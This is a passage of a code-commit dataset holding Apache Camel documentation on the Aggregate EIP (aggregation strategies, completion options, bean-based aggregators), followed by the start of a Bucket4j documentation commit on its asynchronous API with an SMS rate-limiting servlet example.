nextHeaders) {\n return existing + next;\n}\n----\n\nAnd finally if we have 6 parameters, that includes the exchange properties:\n\n[source,java]\n----\npublic String append(String existing, Map existingHeaders, Map existingProperties,\n String next, Map nextHeaders, Map nextProperties) {\n return existing + next;\n}\n----\n\nTo use this with the aggregate EIP we can use a bean with the aggregate logic as follows:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public String append(String existing, String next) {\n return next + existing;\n }\n\n}\n----\n\nAnd then in the Camel route we create an instance of our bean, and then\nrefer to the bean in the route using `bean` method from\n`org.apache.camel.builder.AggregationStrategies` as shown:\n\n[source,java]\n----\nprivate MyBodyAppender appender = new MyBodyAppender();\n\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(appender, \"append\"))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nWe can also provide the bean class type directly:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(MyBodyAppender.class, \"append\"))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nAnd if the bean has only one method we do not need to specify the name\nof the method:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(MyBodyAppender.class))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nAnd the `append` method could be static:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public static String append(String existing, String next) {\n return next + existing;\n }\n\n}\n----\n\nIf you are using XML DSL then we need to declare a `<bean>` with the bean:\n\n[source,xml]\n----\n<bean id=\"myAppender\" class=\"com.foo.MyBodyAppender\"\/>\n----\n\nAnd in the Camel route we use `strategyRef` to refer to the bean by its\nid, and the `strategyMethodName` can be used to define the method name\nto call:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\" strategyMethodName=\"append\" completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\nWhen using XML DSL you can also specify the bean class directly in `strategyRef`\nusing the `#class:` syntax as shown:\n\n[source,xml]\n----\n<route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"#class:com.foo.MyBodyAppender\" strategyMethodName=\"append\" completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n<\/route>\n----\n\nYou can use this in XML DSL when you are not using the classic Spring XML files;\nwhere you use XML only for Camel routes.\n\n=== Aggregating when no data\n\nWhen using bean as `AggregationStrategy`, then the method is\n*only* invoked when there is data to be aggregated, meaning that the message body\nis not `null`. In cases where you want to have the method invoked, even when there are no data (message body is `null`),\nthen set the `strategyMethodAllowNull` to `true`.\n\nWhen using beans this can be configured a bit easier using the `beanAllowNull` method\nfrom `AggregationStrategies` as shown:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .pollEnrich(\"seda:foo\", 1000, AggregationStrategies.beanAllowNull(appender, \"append\"))\n .to(\"mock:result\");\n}\n----\n\nThen the `append` method in the bean would need to deal with the\nsituation that `newExchange` can be `null`:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public String append(String existing, String next) {\n if (next == null) {\n return \"NewWasNull\" + existing;\n } else {\n return existing + next;\n }\n }\n\n}\n----\n\nIn the example above we use the xref:content-enricher.adoc[Content Enricher]\nEIP using `pollEnrich`. The `newExchange` will be `null` in the\nsituation we could not get any data from the \"seda:foo\" endpoint, and\na timeout was hit after 1 second.\n\nSo if we need to do special merge logic we would need to set `setAllowNullNewExchange=true`.\nIf we don't do this then on timeout the append method would normally not be\ninvoked, meaning the xref:content-enricher.adoc[Content Enricher] did\nnot merge\/change the message.\n\nIn XML DSL you would configure the `strategyMethodAllowNull` option and\nset it to `true` as shown below:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\"\n strategyMethodName=\"append\"\n strategyMethodAllowNull=\"true\"\n completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\n=== Aggregating with different body types\n\nWhen for example using `strategyMethodAllowNull` as `true`, then the\nparameter types of the message bodies does not have to be the same. For\nexample suppose we want to aggregate from a `com.foo.User` type to a\n`List<String>` that contains the name of the user. We could code a bean as follows:\n\n[source,java]\n----\npublic final class MyUserAppender {\n\n public List addUsers(List names, User user) {\n if (names == null) {\n names = new ArrayList();\n }\n names.add(user.getName());\n return names;\n }\n}\n----\n\nNotice that the return type is a `List` which we want to contain the name of the users.\nThe 1st parameter is the `List` of names, and the 2nd parameter is the incoming `com.foo.User` type.\n","old_contents":"= Aggregate EIP\n:doctitle: Aggregate\n:shortname: aggregate\n:description: Aggregates many messages into a single message\n:since: \n:supportlevel: Stable\n\nThe\nhttp:\/\/www.enterpriseintegrationpatterns.com\/Aggregator.html[Aggregator]\nfrom the xref:enterprise-integration-patterns.adoc[EIP patterns] allows\nyou to combine a number of messages together into a single message.\n\nimage::eip\/Aggregator.gif[image]\n\nThe aggregator is one of the most complex EIP and has many features and configurations.\n\nThe logic for combing messages together is _correlated_ in buckets based on a _correlation key_.\nMessages with the same correlation key is aggregated together, using an `AggregationStrategy`.\n\n== Aggregator options\n\n\/\/ eip options: START\ninclude::partial$eip-options.adoc[]\n\/\/ eip options: END\n\n== Worker pools\n\nThe aggregate EIP will always use a worker pool, that is used to process all the outgoing messages from the aggregator.\nThe worker pool is determined accordingly:\n\n- If a custom `ExecutorService` has been configured, then this is used as worker pool.\n- If `parallelProcessing=true` then a _default_ worker pool (is 10 worker threads by default) is created.\nHowever, the thread pool size and other configurations can be configured using _thread pool profiles_.\n- Otherwise, a single threaded worker pool is created.\n\n== Aggregating\n\nThe `AggregationStrategy` is used for aggregating the old, and the new exchanges together into a single exchange;\nthat becomes the next old, when the next message is aggregated, and so forth.\n\nPossible implementations include performing some kind of combining or\ndelta processing, such as adding line items together into an invoice or\njust using the newest exchange and removing old exchanges such as for\nstate tracking or market data prices; where old values are of little\nuse.\n\nNotice the aggregation strategy is a mandatory option and must be\nprovided to the aggregator.\n\nIMPORTANT: In the aggregate method, do not create a new exchange instance to return,\ninstead return either the old or new exchange from the input parameters;\nfavor returning the old exchange whenever possible.\n\nHere are a few example `AggregationStrategy` implementations that should\nhelp you create your own custom strategy.\n\n[source,java]\n----\n\/\/simply combines Exchange String body values using '+' as a delimiter\nclass StringAggregationStrategy implements AggregationStrategy {\n\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n return newExchange;\n }\n\n String oldBody = oldExchange.getIn().getBody(String.class);\n String newBody = newExchange.getIn().getBody(String.class);\n oldExchange.getIn().setBody(oldBody + \"+\" + newBody);\n return oldExchange;\n }\n}\n\n\/\/simply combines Exchange body values into an ArrayList<Object>\nclass ArrayListAggregationStrategy implements AggregationStrategy {\n\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n Object newBody = newExchange.getIn().getBody();\n ArrayList<Object> list = null;\n if (oldExchange == null) {\n list = new ArrayList<Object>();\n list.add(newBody);\n newExchange.getIn().setBody(list);\n return newExchange;\n } else {\n list = oldExchange.getIn().getBody(ArrayList.class);\n list.add(newBody);\n return oldExchange;\n }\n }\n}\n----\n\nTIP: The `org.apache.camel.builder.AggregationStrategies` is a builder that can\nbe used for creating commonly used aggregation strategies without having to create a class.\n\n=== Aggregate by grouping exchanges\n\nIn the route below we group all the exchanges together using\n`GroupedExchangeAggregationStrategy`:\n\n[source,java]\n----\nfrom(\"direct:start\")\n \/\/ aggregate all using same expression and group the\n \/\/ exchanges so we get one single exchange containing all\n \/\/ the others\n .aggregate(new GroupedExchangeAggregationStrategy()).constant(true)\n \/\/ wait for 0.5 seconds to aggregate\n .completionTimeout(500L).to(\"mock:result\");\n----\n\nAs a result we have one outgoing `Exchange` being\nrouted to the `\"mock:result\"` endpoint. The exchange is a holder\ncontaining all the incoming Exchanges.\n\nThe output of the aggregator will then contain the exchanges grouped\ntogether in a list as shown below:\n\n[source,java]\n----\nList<Exchange> grouped = exchange.getMessage().getBody(List.class);\n----\n\n=== Aggregating into a List\n\nIf you want to aggregate some value from the messages `<V>` into a `List<V>`\nthen you can use the\n`org.apache.camel.processor.aggregate.AbstractListAggregationStrategy`\nabstract class.\n\nThe completed Exchange that is sent out of the aggregator will contain the `List<V>` in\nthe message body.\n\nFor example to aggregate a `List<Integer>` you can extend this class as\nshown below, and implement the `getValue` method:\n\n[source,java]\n----\npublic class MyListOfNumbersStrategy extends AbstractListAggregationStrategy<Integer> {\n\n @Override\n public Integer getValue(Exchange exchange) {\n \/\/ the message body contains a number, so just return that as-is\n return exchange.getIn().getBody(Integer.class);\n }\n}\n----\n\nThe `org.apache.camel.builder.AggregationStrategies` is a builder that can\nbe used for creating commonly used aggregation strategies without having to create a class.\n\nThe previous example can also be built using the builder as shown:\n\n[source,java]\n----\nAggregationStrategy agg = AggregationStrategies.flexible(Integer.class)\n .accumulateInCollection(ArrayList.class)\n .pick(body());\n----\n\n=== Aggregating on timeout\n\nIf your aggregation strategy implements\n`TimeoutAwareAggregationStrategy`, then Camel will invoke the `timeout`\nmethod when the timeout occurs. Notice that the values for index and\ntotal parameters will be -1, and the timeout parameter will be provided\nonly if configured as a fixed value. You must *not* throw any exceptions\nfrom the `timeout` method.\n\n=== Aggregate with persistent repository\n\nThe aggregator provides a pluggable repository which you can implement\nyour own `org.apache.camel.spi.AggregationRepository`.\n\nIf you need persistent repository then Camel provides numerous implementations, such as from the\nxref:ROOT:caffeine-cache-component.adoc[Caffeine],\nxref:ROOT:cql-component.adoc[CassandraQL],\nxref:ROOT:ehcache-component.adoc[EHCache],\nxref:ROOT:infinispan-component.adoc[Infinispan],\nxref:ROOT:jcache-component.adoc[JCache],\nxref:others:leveldb.adoc[LevelDB],\nxref:others:redis.adoc[Redis],\nor xref:ROOT:sql-component.adoc[SQL] components.\n\n== Completion\n\nWhen aggregation xref:manual::exchange.adoc[Exchange]s at some point you need to\nindicate that the aggregated exchanges is complete, so they can be sent\nout of the aggregator. Camel allows you to indicate completion in\nvarious ways as follows:\n\n* _completionTimeout_ - Is an inactivity timeout in which is triggered if\nno new exchanges have been aggregated for that particular correlation\nkey within the period.\n* _completionInterval_ - Once every X period all the current aggregated\nexchanges are completed.\n* _completionSize_ - Is a number indicating that after X aggregated\nexchanges its complete.\n* _completionPredicate_ - Runs a xref:manual::predicate.adoc[Predicate] when a new\nexchange is aggregated to determine if we are complete or not.\nThe configured aggregationStrategy can implement the\nPredicate interface and will be used as the completionPredicate if no\ncompletionPredicate is configured. The configured aggregationStrategy can\noverride the `preComplete` method and will be used as\nthe completionPredicate in pre-complete check mode. See further below\nfor more details.\n* _completionFromBatchConsumer_ - Special option for\nxref:manual::batch-consumer.adoc[Batch Consumer] which allows you to complete\nwhen all the messages from the batch has been aggregated.\n* _forceCompletionOnStop_ - Indicates to complete all current\naggregated exchanges when the context is stopped\n* _AggregateController_ - which allows to use an external source (`AggregateController` implementation) to complete groups or all groups.\nThis can be done using Java or JMX API.\n\nAll the different completions are per correlation key. You can\ncombine them in any way you like. It's basically the first which\ntriggers that wins. So you can use a completion size together with a\ncompletion timeout. Only completionTimeout and completionInterval cannot\nbe used at the same time.\n\nCompletion is mandatory and must be configured on the aggregation.\n\n=== Pre-completion mode\n\nThere can be use-cases where you want the incoming\nxref:manual::exchange.adoc[Exchange] to determine if the correlation group\nshould pre-complete, and then the incoming\nxref:manual::exchange.adoc[Exchange] is starting a new group from scratch.\nThe pre-completion mode must be enabled by the `AggregationStrategy` by overriding the `canPreComplete` method\nto return a `true` value.\n\nWhen pre completion is enabled then the `preComplete` method is invoked:\n\n[source,java]\n----\n\/**\n * Determines if the aggregation should complete the current group, and start a new group, or the aggregation\n * should continue using the current group.\n *\n * @param oldExchange the oldest exchange (is <tt>null<\/tt> on first aggregation as we only have the new exchange)\n * @param newExchange the newest exchange (can be <tt>null<\/tt> if there was no data possible to acquire)\n * @return <tt>true<\/tt> to complete current group and start a new group, or <tt>false<\/tt> to keep using current\n *\/\nboolean preComplete(Exchange oldExchange, Exchange newExchange);\n----\n\nIf the `preComplete` method returns `true`, then the existing correlation groups is\ncompleted (without aggregating the incoming exchange (`newExchange`).\nThen the `newExchange` is used to start the correlation group from scratch,\nso the group would contain only that new incoming exchange. This is\nknown as pre-completion mode.\n\nWhen the aggregation is in _pre-completion_ mode, then only the following completions are in use:\n\n* _completionTimeout_ or _completionInterval_ can also be used as fallback\ncompletions\n* any other completion are not used (such as by size, from batch consumer etc)\n* _eagerCheckCompletion_ is implied as `true`, but the option has no effect\n\n=== CompletionAwareAggregationStrategy\n\nIf your aggregation strategy implements\n`CompletionAwareAggregationStrategy`, then Camel will invoke the\n`onComplete` method when the aggregated `Exchange` is completed. This\nallows you to do any last minute custom logic such as to clean up some\nresources, or additional work on the exchange as it's now completed.\nYou must *not* throw any exceptions from the `onCompletion` method.\n\n=== Completing current group decided from the AggregationStrategy\n\nThe `AggregationStrategy` supports checking for the\n\nthe exchange property (`Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP`)\non the returned `Exchange` that contains a boolean to indicate if the current\ngroup should be completed. This allows to overrule any existing\ncompletion predicates \/ sizes \/ timeouts etc, and complete the group.\n\nFor example the following logic will complete the\ngroup if the message body size is larger than 5. This is done by setting\nthe exchange property `Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP` to `true`.\n\n[source,java]\n----\npublic final class MyCompletionStrategy implements AggregationStrategy {\n @Override\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n return newExchange;\n }\n String body = oldExchange.getIn().getBody(String.class) + \"+\"\n + newExchange.getIn().getBody(String.class);\n oldExchange.getIn().setBody(body);\n if (body.length() >= 5) {\n oldExchange.setProperty(Exchange.AGGREGATION_COMPLETE_CURRENT_GROUP, true);\n }\n return oldExchange;\n }\n}\n----\n\n=== Completing all previous group decided from the AggregationStrategy\n\nThe `AggregationStrategy` checks an exchange property, from the returned exchange,\nindicating if all previous groups should be completed.\n\nThis allows to overrule any existing\ncompletion predicates \/ sizes \/ timeouts etc, and complete all the existing\nprevious group.\n\nThe following logic will complete all the\nprevious groups, and start a new aggregation group.\n\nThis is done by setting the property `Exchange.AGGREGATION_COMPLETE_ALL_GROUPS` to `true`\non the returned exchange.\n\n[source,java]\n----\npublic final class MyCompletionStrategy implements AggregationStrategy {\n @Override\n public Exchange aggregate(Exchange oldExchange, Exchange newExchange) {\n if (oldExchange == null) {\n \/\/ we start a new correlation group, so complete all previous groups\n newExchange.setProperty(Exchange.AGGREGATION_COMPLETE_ALL_GROUPS, true);\n return newExchange;\n }\n\n String body1 = oldExchange.getIn().getBody(String.class);\n String body2 = newExchange.getIn().getBody(String.class);\n\n oldExchange.getIn().setBody(body1 + body2);\n return oldExchange;\n }\n}\n----\n\n=== Manually force the completion of all aggregated Exchanges immediately\n\nYou can manually trigger completion of all current aggregated exchanges\nby sending an exchange containing the exchange property\n`Exchange.AGGREGATION_COMPLETE_ALL_GROUPS` set to `true`. The message is\nconsidered a signal message only, the message headers\/contents will not\nbe processed otherwise.\n\nYou can alternatively set the exchange property\n`Exchange.AGGREGATION_COMPLETE_ALL_GROUPS_INCLUSIVE` to `true` to trigger\ncompletion of all groups after processing the current message.\n\n=== Using a controller to force the aggregator to complete\n\nThe `org.apache.camel.processor.aggregate.AggregateController` allows\nyou to control the aggregate at runtime using Java or JMX API. This can\nbe used to force completing groups of exchanges, or query its current\nruntime statistics.\n\nThe aggregator provides a default implementation if no custom have been\nconfigured, which can be accessed using `getAggregateController()` method.\nThough it may be easier to configure a controller in the route using\n`aggregateController` as shown below:\n\n[source,java]\n----\nprivate AggregateController controller = new DefaultAggregateController();\n\nfrom(\"direct:start\")\n .aggregate(header(\"id\"), new MyAggregationStrategy())\n .completionSize(10).id(\"myAggregator\")\n .aggregateController(controller)\n .to(\"mock:aggregated\");\n----\n\nThen there is API on `AggregateController` to force completion. For\nexample to complete a group with key foo:\n\n[source,java]\n----\nint groups = controller.forceCompletionOfGroup(\"foo\");\n----\n\nThe returned value is the number of groups completed.\nA value of 1 is returned if the foo group existed, otherwise 0 is returned.\n\nThere is also a method to complete all groups:\n\n[source,java]\n----\nint groups = controller.forceCompletionOfAllGroups();\n----\n\nThe controller can also be used in XML DSL using the `aggregateControllerRef` to\nrefer to a bean with the controller implementation, which is looked up in the registry.\n\nWhen using Spring XML you can create the bean with `<bean>` as shown:\n\n[source,xml]\n----\n<bean id=\"myController\" class=\"org.apache.camel.processor.aggregate.DefaultAggregateController\"\/>\n \n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\" completionSize=\"10\"\n aggregateControllerRef=\"myController\">\n <correlationExpression>\n <header>id<\/header>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\nThere is also JMX API on the aggregator which is available under the processors node in the Camel JMX tree.\n\n== Aggregating with Beans\n\nTo use the `AggregationStrategy` you had to implement the\n`org.apache.camel.AggregationStrategy` interface,\nwhich means your logic would be tied to the Camel API.\nYou can use a bean for the logic and let Camel adapt to your\nbean. To use a bean a convention must be followed:\n\n* there must be a public method to use\n* the method must not be void\n* the method can be static or non-static\n* the method must have 2 or more parameters\n* the parameters are paired, so the first half is applied to the\n`oldExchange`, and the reminder half is for the `newExchange`.\n Therefore, there must be an equal number of parameters, eg 2, 4, 6 etc.\n\nThe paired methods is expected to be ordered as follows:\n\n* the first parameter is the message body\n* optional, the 2nd parameter is a `Map` of the headers\n* optional, the 3rd parameter is a `Map` of the exchange properties\n\nThis convention is best explained with some examples.\n\nIn the method below, we have only 2 parameters, so the 1st parameter is\nthe body of the `oldExchange`, and the 2nd is paired to the body of the\n`newExchange`:\n\n[source,java]\n----\npublic String append(String existing, String next) {\n return existing + next;\n}\n----\n\nIn the method below, we have only 4 parameters, so the 1st parameter is\nthe body of the `oldExchange`, and the 2nd is the `Map` of the\n`oldExchange` headers, and the 3rd is paired to the body of the `newExchange`,\nand the 4th parameter is the `Map` of the `newExchange` headers:\n\n[source,java]\n----\npublic String append(String existing, Map existingHeaders, String next, Map nextHeaders) {\n return existing + next;\n}\n----\n\nAnd finally if we have 6 parameters, that includes the exchange properties:\n\n[source,java]\n----\npublic String append(String existing, Map existingHeaders, Map existingProperties,\n String next, Map nextHeaders, Map nextProperties) {\n return existing + next;\n}\n----\n\nTo use this with the aggregate EIP we can use a bean with the aggregate logic as follows:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public String append(String existing, String next) {\n return next + existing;\n }\n\n}\n----\n\nAnd then in the Camel route we create an instance of our bean, and then\nrefer to the bean in the route using `bean` method from\n`org.apache.camel.builder.AggregationStrategies` as shown:\n\n[source,java]\n----\nprivate MyBodyAppender appender = new MyBodyAppender();\n\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(appender, \"append\"))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nWe can also provide the bean class type directly:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(MyBodyAppender.class, \"append\"))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nAnd if the bean has only one method we do not need to specify the name\nof the method:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .aggregate(constant(true), AggregationStrategies.bean(MyBodyAppender.class))\n .completionSize(3)\n .to(\"mock:result\");\n}\n----\n\nAnd the `append` method could be static:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public static String append(String existing, String next) {\n return next + existing;\n }\n\n}\n----\n\nIf you are using XML DSL then we need to declare a `<bean>` with the bean:\n\n[source,xml]\n----\n<bean id=\"myAppender\" class=\"com.foo.MyBodyAppender\"\/>\n----\n\nAnd in the Camel route we use `strategyRef` to refer to the bean by its\nid, and the `strategyMethodName` can be used to define the method name\nto call:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\" strategyMethodName=\"append\" completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\nWhen using XML DSL you can also specify the bean class directly in `strategyRef`\nusing the `#class:` syntax as shown:\n\n[source,xml]\n----\n<route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"#class:com.foo.MyBodyAppender\" strategyMethodName=\"append\" completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n<\/route>\n----\n\nYou can use this in XML DSL when you are not using the classic Spring XML files;\nwhere you use XML only for Camel routes.\n\n=== Aggregating when no data\n\nWhen using bean as `AggregationStrategy`, then the method is\n*only* invoked when there is data to be aggregated, meaning that the message body\nis not `null`. In cases where you want to have the method invoked, even when there are no data (message body is `null`),\nthen set the `strategyMethodAllowNull` to `true`.\n\nWhen using beans this can be configured a bit easier using the `beanAllowNull` method\nfrom `AggregationStrategies` as shown:\n\n[source,java]\n----\npublic void configure() throws Exception {\n from(\"direct:start\")\n .pollEnrich(\"seda:foo\", 1000, AggregationStrategies.beanAllowNull(appender, \"append\"))\n .to(\"mock:result\");\n}\n----\n\nThen the `append` method in the bean would need to deal with the\nsituation that `newExchange` can be `null`:\n\n[source,java]\n----\npublic class MyBodyAppender {\n\n public String append(String existing, String next) {\n if (next == null) {\n return \"NewWasNull\" + existing;\n } else {\n return existing + next;\n }\n }\n\n}\n----\n\nIn the example above we use the xref:content-enricher.adoc[Content Enricher]\nEIP using `pollEnrich`. The `newExchange` will be `null` in the\nsituation we could not get any data from the \"seda:foo\" endpoint, and\na timeout was hit after 1 second.\n\nSo if we need to do special merge logic we would need to set `setAllowNullNewExchange=true`.\nIf we don't do this then on timeout the append method would normally not be\ninvoked, meaning the xref:content-enricher.adoc[Content Enricher] did\nnot merge\/change the message.\n\nIn XML DSL you would configure the `strategyMethodAllowNull` option and\nset it to `true` as shown below:\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:start\"\/>\n <aggregate strategyRef=\"myAppender\"\n strategyMethodName=\"append\"\n strategyMethodAllowNull=\"true\"\n completionSize=\"3\">\n <correlationExpression>\n <constant>true<\/constant>\n <\/correlationExpression>\n <to uri=\"mock:result\"\/>\n <\/aggregate>\n <\/route>\n<\/camelContext>\n----\n\n=== Aggregating with different body types\n\nWhen for example using `strategyMethodAllowNull` as `true`, then the\nparameter types of the message bodies does not have to be the same. For\nexample suppose we want to aggregate from a `com.foo.User` type to a\n`List<String>` that contains the name of the user. We could code a bean as follows:\n\n[source,java]\n----\npublic final class MyUserAppender {\n\n public List addUsers(List names, User user) {\n if (names == null) {\n names = new ArrayList();\n }\n names.add(user.getName());\n return names;\n }\n}\n----\n\nNotice that the return type is a `List` which we want to contain the name of the users.\nThe 1st parameter is the `List` of names, and the 2nd parameter is the incoming `com.foo.User` type.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d27977d21d902f8141fd71a254cb38ecc9c7474f","subject":"asynchronous.adoc","message":"asynchronous.adoc\n","repos":"vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j,vladimir-bukhtoyarov\/bucket4j","old_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/asynchronous.adoc","new_file":"asciidoc\/src\/main\/docs\/asciidoc\/distributed\/asynchronous.adoc","new_contents":"=== Asynchronous API\nSince version ``3.0`` Bucket4j provides asynchronous analogs for the majority of API methods.\nAsync view of proxyManager is available through ``asAsync()`` method:\n[source, java]\n----\nProxyManager proxyManager = ...;\nAsyncProxyManager asyncProxyManager = proxyManager.asAsync();\n\nBucketConfiguration configuration = ...;\nAsyncBucketProxy asyncBucket = asyncProxyManager.builder().build(key, configuration);\n----\nEach method of class ```AsyncBucketProxy``` has full equivalence with the same semantic in asynchronous version in the ```Bucket``` class.\n\n==== Example - limiting the rate of access to the asynchronous servlet\nImagine that you develop an SMS service, which allows sending SMS via an HTTP interface.\nYou want your architecture to be protected from overloading, clustered, and fully asynchronous.\n\n**Overloading protection requirement:**\n\n> To prevent fraud and service overloading you want to introduce the following limit for any outbound phone number: The bucket size is 20 SMS (which cannot be exceeded at any given time), with a \"refill rate\" of 10 SMS per minute that continually increases tokens in the bucket.\nIn other words, if a client sends 10 SMS per minute, it will never be throttled,\nand moreover, the client has overdraft equals to 20 SMS which can be used if the average is a little bit higher than 10 SMS\/minute on short time period.\n**Solution:** let's use bucket4j for this.\n\n**Clustering requirement:**\n\n> You want to avoid the single point of failure, if one server crashed that information about consumed tokens should not be lost,\nthus it would be better to use any distributed computation platform for storing the buckets.\n\n**Solution:** let's use JBoss Infinispan for this and ``bucket4j-infinispan`` extension.\nHazelcast and Apache Ignite will be also well-chosen, Infinispan just selected as an example.\n\n**Asynchronous processing requirement:**\nAlso for maximum scalability, you want from architecture to be fully non-blocking,\nnon-blocking architecture means that both sms sending and limit checking should be asynchronous.\n**Solution:** let's use asynchronous features provided by bucket4j and Servlet-API.\n\n**Mockup of service based on top of Servlet API and bucket4j-infinispan**:\n[source, java]\n----\npublic class SmsServlet extends javax.servlet.http.HttpServlet {\n\n private SmsSender smsSender;\n private AsyncProxyManager<String> buckets;\n private Supplier<BucketConfiguration> configuration;\n \n @Override\n public void init(ServletConfig config) throws ServletException {\n super.init(config);\n ServletContext ctx = config.getServletContext();\n \n smsSender = (SmsSender) ctx.getAttribute(\"sms-sender\");\n \n FunctionalMapImpl<String, byte[]> bucketMap = (FunctionalMapImpl<String, byte[]>) ctx.getAttribute(\"bucket-map\");\n this.buckets = new InfinispanProxyManager(bucketMap).asAsync();\n \n this.configuration = () -> {\n long overdraft = 20;\n Refill refill = Refill.greedy(10, Duration.ofMinutes(1));\n Bandwidth limit = Bandwidth.classic(overdraft, refill);\n return BucketConfiguratiion.builder()\n .addLimit(limit)\n .build();\n };\n }\n \n @Override\n protected void doPost(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {\n HttpServletRequest httpRequest = (HttpServletRequest) servletRequest;\n \n String fromNumber = req.getParameter(\"from\");\n String toNumber = req.getParameter(\"to\");\n String text = req.getParameter(\"text\");\n \n AsyncBucketProxy bucket = buckets.builder().build(fromNumber, configuration);\n CompletableFuture<ConsumptionProbe> limitCheckingFuture = bucket.asAsync().tryConsumeAndReturnRemaining(1);\n final AsyncContext asyncContext = req.startAsync();\n limitCheckingFuture.thenCompose(probe -> {\n if (!probe.isConsumed()) {\n Result throttledResult = Result.throttled(probe);\n return CompletableFuture.completedFuture(throttledResult);\n } else {\n CompletableFuture<Result> sendingFuture = smsSender.sendAsync(fromNumber, toNumber, text);\n return sendingFuture;\n }\n }).whenComplete((result, exception) -> {\n HttpServletResponse asyncResponse = (HttpServletResponse) asyncContext.getResponse();\n try {\n asyncResponse.setContentType(\"text\/plain\");\n if (exception != null || result.isFailed()) {\n asyncResponse.setStatus(500);\n asyncResponse.getWriter().println(\"Internal Error\");\n } else if (result.isThrottled()) {\n asyncResponse.setStatus(429);\n asyncResponse.setHeader(\"X-Rate-Limit-Retry-After-Seconds\", \"\" + result.getRetryAfter());\n asyncResponse.getWriter().append(\"Too many requests\");\n } else {\n asyncResponse.setStatus(200);\n asyncResponse.getWriter().append(\"Success\");\n }\n } finally{\n asyncContext.complete();\n }\n });\n }\n\n}\n----\n","old_contents":"=== Asynchronous API\nSince version ``3.0`` Bucket4j provides asynchronous analogs for majority of API methods.\nAsync view of proxyManager is available through ``asAsync()`` method:\n[source, java]\n----\nProxyManager proxyManager = ...;\nAsyncProxyManager asyncProxyManager = proxyManager.asAsync();\n\nBucketConfiguration configuration = ...;\nAsyncBucketProxy asyncBucket = asyncProxyManager.builder().build(key, configuration);\n----\nEach method of class ```AsyncBucketProxy``` has full equivalence with same semantic in synchronous version in the ```Bucket``` class.\n\n==== Example - limiting the rate of access to asynchronous servlet\nImagine that you develop SMS service, which allows send SMS via HTTP interface.\nYou want from your architecture to be protected from overloading, clustered and fully asynchronous.\n\n**Overloading protection requirement:**\n\n> To prevent fraud and service overloading you want to introduce following limit for any outbound phone number: The bucket size is 20 SMS (which cannot be exceeded at any given time), with a \"refill rate\" of 10 SMS per minute that continually increases tokens in the bucket.\nIn other words, if client sends 10 SMS per minute, it will never be throttled,\nand moreover client have overdraft equals to 20 SMS which can be used if average is little bit higher that 10 SMS\/minute on short time period. \n**Solution:** lets use bucket4j for this.\n\n**Clustering requirement:**\n\n> You want to avoid the single point of failure, if one server crashed that information about consumed tokens should not be lost,\nthus it would be better to use any distributed computation platform for storing the buckets. \n\n**Solution:** lets use JBoss Infinispan for this and ``bucket4j-infinispan`` extension.\nHazelcast and Apache Ignite will be also well choice, Infinispan just selected as example.\n\n**Asynchronous processing requirement:**\nAlso for maximum scalability you want from architecture to be 